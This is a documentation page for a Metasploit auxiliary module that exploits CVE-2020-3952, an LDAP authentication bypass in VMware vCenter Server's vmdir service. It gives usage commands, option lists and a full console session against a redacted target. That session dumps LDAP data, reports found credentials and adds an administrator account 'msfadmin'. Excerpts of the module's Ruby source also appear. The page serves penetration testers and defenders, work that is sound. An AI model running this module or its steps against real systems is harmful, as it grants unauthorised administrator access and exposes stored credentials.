VMware vCenter Server vmdir Authentication Bypass - Metasploit
This page contains detailed information about how to use the auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: VMware vCenter Server vmdir Authentication Bypass
Module: auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
Source code: modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb
Disclosure date: 2020-04-09
Last modification time: 2022-01-12 16:51:40 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 636
List of CVEs: CVE-2020-3952
This module bypasses LDAP authentication in VMware vCenter Server's vmdir service to add an arbitrary administrator user. Version 6.7 prior to the 6.7U3f update is vulnerable, only if upgraded from a previous release line, such as 6.0 or 6.5.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Stability:
- service-resource-loss: Module may cause a resource (such as a file or data in a database) to be unavailable for the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- config-changes: Module modifies some configuration setting on the target machine.
Basic Usage
msf > use auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > show targets
... a list of targets ...
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > set TARGET target-id
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > show options
... show and set options ...
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > exploit
Required Options
RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
CheckModule: Module to check with
Knowledge Base
Vulnerable Application
Description
This module bypasses LDAP authentication in VMware vCenter Server's vmdir service to add an arbitrary administrator user. Version 6.7 prior to the 6.7U3f update is vulnerable, only if upgraded from a previous release line, such as 6.0 or 6.5.
Setup
Tested in the wild. No setup notes available at this time, as setup will be specific to target environment.
Verification Steps
Actions
Add
Add an admin user to the vCenter Server.
Options
BASE_DN
If you already have the LDAP base DN, you may set it in this option.
USERNAME
Set this to the username for the new admin user.
PASSWORD
Set this to the password for the new admin user.
Scenarios
VMware vCenter Server 6.7 virtual appliance on ESXi
msf5 > use auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > options
Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
BASE_DN no LDAP base DN if you already have it
PASSWORD no Password of admin user to add
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 636 yes The target port
SSL true no Enable SSL on the LDAP connection
USERNAME no Username of admin user to add
Auxiliary action:
Name Description
---- -----------
Add Add an admin user
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set rhosts [redacted]
rhosts => [redacted]
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set username msfadmin
username => msfadmin
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set password msfadmin
password => msfadmin
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > run
[*] Running module against [redacted]
not verifying SSL hostname of LDAPS server '[redacted]:636'
[*] Using auxiliary/gather/vmware_vcenter_vmdir_ldap as check
[*] Discovering base DN automatically
[*] Searching root DSE for base DN
dn: cn=DSE Root
namingcontexts: dc=vsphere,dc=local
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.1
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.2
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.3
supportedcontrol: 1.2.840.113556.1.4.417
supportedcontrol: 1.2.840.113556.1.4.319
supportedldapversion: 3
supportedsaslmechanisms: GSSAPI
[+] Discovered base DN: dc=vsphere,dc=local
[*] Dumping LDAP data from vmdir service at [redacted]:636
[+] [redacted]:636 is vulnerable to CVE-2020-3952
[*] Storing LDAP data in loot
[+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002255_default_[redacted]_VMwarevCenterS_975097.txt
[*] Password and lockout policy:
vmwpasswordchangeautounlockintervalsec: [redacted]
vmwpasswordchangefailedattemptintervalsec: [redacted]
vmwpasswordchangemaxfailedattempts: [redacted]
vmwpasswordlifetimedays: [redacted]
vmwpasswordmaxidenticaladjacentchars: [redacted]
vmwpasswordmaxlength: [redacted]
vmwpasswordminalphabeticcount: [redacted]
vmwpasswordminlength: [redacted]
vmwpasswordminlowercasecount: [redacted]
vmwpasswordminnumericcount: [redacted]
vmwpasswordminspecialcharcount: [redacted]
vmwpasswordminuppercasecount: [redacted]
vmwpasswordprohibitedpreviouscount: [redacted]
[+] Credentials found: [redacted]
[snip]
[*] Bypassing LDAP auth in vmdir service at [redacted]:636
[*] Adding admin user msfadmin with password msfadmin
[+] Added user msfadmin, so auth bypass was successful!
[+] Added user msfadmin to admin group
[*] Auxiliary module execution completed
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) >
Go back to menu.
Msfconsole Usage
Here is how the admin/ldap/vmware_vcenter_vmdir_auth_bypass auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show info
Name: VMware vCenter Server vmdir Authentication Bypass
Module: auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2020-04-09
Provided by:
Hynek Petrak
JJ Lehmann
Ofri Ziv
wvu <[email protected]>
Module side effects:
ioc-in-logs
config-changes
Module stability:
service-resource-loss
Available actions:
Name Description
---- -----------
Add Add an admin user
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BASE_DN no LDAP base DN if you already have it
BIND_DN no The username to authenticate to LDAP server
BIND_PW no Password for the BIND_DN
PASSWORD no Password of admin user to add
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 636 yes The target port
SSL true no Enable SSL on the LDAP connection
USERNAME no Username of admin user to add
Description:
This module bypasses LDAP authentication in VMware vCenter Server's
vmdir service to add an arbitrary administrator user. Version 6.7
prior to the 6.7U3f update is vulnerable, only if upgraded from a
previous release line, such as 6.0 or 6.5.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-3952
https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/
https://www.vmware.com/security/advisories/VMSA-2020-0006.html
Module Options
This is a complete list of options available in the admin/ldap/vmware_vcenter_vmdir_auth_bypass auxiliary module:
msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show options
Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
BASE_DN no LDAP base DN if you already have it
BIND_DN no The username to authenticate to LDAP server
BIND_PW no Password for the BIND_DN
PASSWORD no Password of admin user to add
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 636 yes The target port
SSL true no Enable SSL on the LDAP connection
USERNAME no Username of admin user to add
Auxiliary action:
Name Description
---- -----------
Add Add an admin user
Advanced Options
Here is a complete list of advanced options supported by the admin/ldap/vmware_vcenter_vmdir_auth_bypass auxiliary module:
msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show advanced
Module advanced options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
CheckModule auxiliary/gather/vmware_vcenter_vmdir_ldap yes Module to check with
LDAP::ConnectTimeout 10.0 yes Timeout for LDAP connect
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/ldap/vmware_vcenter_vmdir_auth_bypass module can do:
msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show actions
Auxiliary actions:
Name Description
---- -----------
Add Add an admin user
Evasion Options
Here is the full list of possible evasion options supported by the admin/ldap/vmware_vcenter_vmdir_auth_bypass auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Please set the USERNAME and PASSWORD options to proceed
Here is a relevant code snippet related to the "Please set the USERNAME and PASSWORD options to proceed" error message:
75: "cn=Administrators,cn=Builtin,#{base_dn}"
76: end
77:
78: def run
79: unless username && password
80: print_error('Please set the USERNAME and PASSWORD options to proceed')
81: return
82: end
83:
84: # NOTE: check is provided by auxiliary/gather/vmware_vcenter_vmdir_ldap
85: checkcode = check
Failed to add admin user <USERNAME>
Here is a relevant code snippet related to the "Failed to add admin user <USERNAME>" error message:
98: auth_bypass(ldap)
99:
100: print_status("Adding admin user #{username} with password #{password}")
101:
102: unless add_admin(ldap)
103: print_error("Failed to add admin user #{username}")
104: end
105: end
106: rescue Net::LDAP::Error => e
107: print_error("#{e.class}: #{e.message}")
108: end
Failed to bypass LDAP auth in vmdir service
Here is a relevant code snippet related to the "Failed to bypass LDAP auth in vmdir service" error message:
132: unless ldap.add(dn: user_dn, attributes: user_info)
133: res = ldap.get_operation_result
134:
135: case res.code
136: when Net::LDAP::ResultCodeInsufficientAccessRights
137: print_error('Failed to bypass LDAP auth in vmdir service')
138: when Net::LDAP::ResultCodeEntryAlreadyExists
139: print_error("User #{username} already exists")
140: when Net::LDAP::ResultCodeConstraintViolation
141: print_error("Password #{password} does not meet policy requirements")
142: else
User <USERNAME> already exists
Here is a relevant code snippet related to the "User <USERNAME> already exists" error message:
134:
135: case res.code
136: when Net::LDAP::ResultCodeInsufficientAccessRights
137: print_error('Failed to bypass LDAP auth in vmdir service')
138: when Net::LDAP::ResultCodeEntryAlreadyExists
139: print_error("User #{username} already exists")
140: when Net::LDAP::ResultCodeConstraintViolation
141: print_error("Password #{password} does not meet policy requirements")
142: else
143: print_error("#{res.message}: #{res.error_message}")
144: end
Password <PASSWORD> does not meet policy requirements
Here is a relevant code snippet related to the "Password <PASSWORD> does not meet policy requirements" error message:
136: when Net::LDAP::ResultCodeInsufficientAccessRights
137: print_error('Failed to bypass LDAP auth in vmdir service')
138: when Net::LDAP::ResultCodeEntryAlreadyExists
139: print_error("User #{username} already exists")
140: when Net::LDAP::ResultCodeConstraintViolation
141: print_error("Password #{password} does not meet policy requirements")
142: else
143: print_error("#{res.message}: #{res.error_message}")
144: end
145:
146: return false
User <USERNAME> is already an admin
Here is a relevant code snippet related to the "User <USERNAME> is already an admin" error message:
151: # Add our user to the admin group
152: unless ldap.add_attribute(group_dn, 'member', user_dn)
153: res = ldap.get_operation_result
154:
155: if res.code == Net::LDAP::ResultCodeAttributeOrValueExists
156: print_error("User #{username} is already an admin")
157: else
158: print_error("#{res.message}: #{res.error_message}")
159: end
160:
161: return false
Go back to menu.
Related Pull Requests
- #14734 Merged Pull Request: Rubocop recently landed modules
- #13885 Merged Pull Request: Add LDAPS support and update VMware vCenter Server vmdir (CVE-2020-3952) modules
- #13868 Merged Pull Request: Add hash dumping to auxiliary/gather/vmware_vcenter_vmdir_ldap (CVE-2020-3952)
- #13503 Merged Pull Request: Add BASE_DN and ROOT_KEY options to VMware vCenter vmdir and SaltStack Salt modules
- #13253 Merged Pull Request: Add VMware vCenter Server vmdir Information Disclosure and Authentication Bypass (CVE-2020-3952), plus LDAP mixin
References
- CVE-2020-3952
- https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/
- https://www.vmware.com/security/advisories/VMSA-2020-0006.html
See Also
Check also the following modules related to this module:
- auxiliary/gather/ldap_hashdump
- auxiliary/gather/vmware_vcenter_vmdir_ldap
- auxiliary/admin/ldap/rbcd
- auxiliary/scanner/vmware/vmware_enum_permissions
- auxiliary/scanner/vmware/vmware_enum_sessions
- auxiliary/scanner/vmware/vmware_enum_users
- auxiliary/scanner/vmware/vmware_enum_vms
- auxiliary/scanner/vmware/vmware_host_details
- auxiliary/scanner/vmware/vmware_http_login
- auxiliary/scanner/vmware/vmware_screenshot_stealer
- auxiliary/scanner/vmware/vmware_server_dir_trav
- auxiliary/scanner/vmware/vmware_update_manager_traversal
- exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
- exploit/linux/http/vmware_vcenter_analytics_file_upload
- exploit/linux/http/vmware_vcenter_vsan_health_rce
- exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce
- exploit/linux/http/vmware_vrops_mgr_ssrf_rce
- exploit/linux/http/vmware_workspace_one_access_cve_2022_22954
- exploit/linux/local/vmware_alsa_config
- exploit/linux/local/vmware_mount
- exploit/linux/local/vmware_workspace_one_access_certproxy_lpe
- exploit/linux/ssh/vmware_vdp_known_privkey
- exploit/multi/http/vmware_vcenter_log4shell
- exploit/multi/http/vmware_vcenter_uploadova_rce
- exploit/osx/local/vmware_bash_function_root
- exploit/osx/local/vmware_fusion_lpe
- exploit/windows/http/vmware_vcenter_chargeback_upload
- auxiliary/admin/vmware/poweroff_vm
- auxiliary/admin/vmware/poweron_vm
- auxiliary/admin/vmware/tag_vm
- auxiliary/admin/vmware/terminate_esx_sessions
- auxiliary/admin/vmware/vcenter_forge_saml_token
- auxiliary/admin/vmware/vcenter_offline_mdb_extract
- exploit/windows/ldap/imail_thc
- exploit/windows/ldap/pgp_keyserver7
Authors
- Hynek Petrak
- JJ Lehmann
- Ofri Ziv
- wvu
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.